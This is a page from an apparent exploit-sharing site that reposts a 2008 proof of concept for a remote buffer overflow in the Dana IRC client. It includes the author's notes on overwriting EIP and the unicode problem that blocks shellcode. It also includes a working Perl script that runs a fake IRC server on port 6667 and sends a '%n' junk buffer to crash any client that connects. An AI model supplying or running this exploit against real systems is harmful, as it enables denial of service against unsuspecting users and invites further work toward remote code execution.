ZBC 0day Exploits

ZBC means Zcuu Bug Center.The main duties is Published Exploits and 0day. We have the fastest, latest and the best we to Published 0day.


您当前的位置:zbc exploitsexpdospoc → 文章内容 退出登录 用户管理
Hot
Near
Dana IRC <= 1.3 Remote Buffer Overflow PoC
Author:佚名  ComeFrom:不详  Time:2008-6-19 21:04:39

little big

- Dana IRC <= 1.3 Remote Buffer Overflow POC/Crash -Discovered On: 14 JUNE 2008Discovered By: t0pP8uZzDownload: diebestenbits.de- Info -Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2koverwrites the EIP therefor crashes the client. The reason why there isnt any shellcode hereis because the client is coverting the junk/buffer data to unicode so its corrupting the shellcodeive tried sending unicode buffer but the same problem occurs.if anyone else can get further please let me know. but i doubt you can.there are also other registers you can overwrite using diffrent junk data to overflow them.the peice of perl code below will listen on port 6667 and when a Dana IRC client connectsit will crash the client. its also possible to send the data direct to the user.peace, t0pP8uZz#!/usr/bin/perluse IO::Socket;$sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 );$jnk = "%n"x1000;print "Running..";while($client = $sock->accept()) { print $client "$jnk\r\n"; print "Crashed Client!\n";}# exp.zcuu.com [2008-06-14]
[] [goback] [print]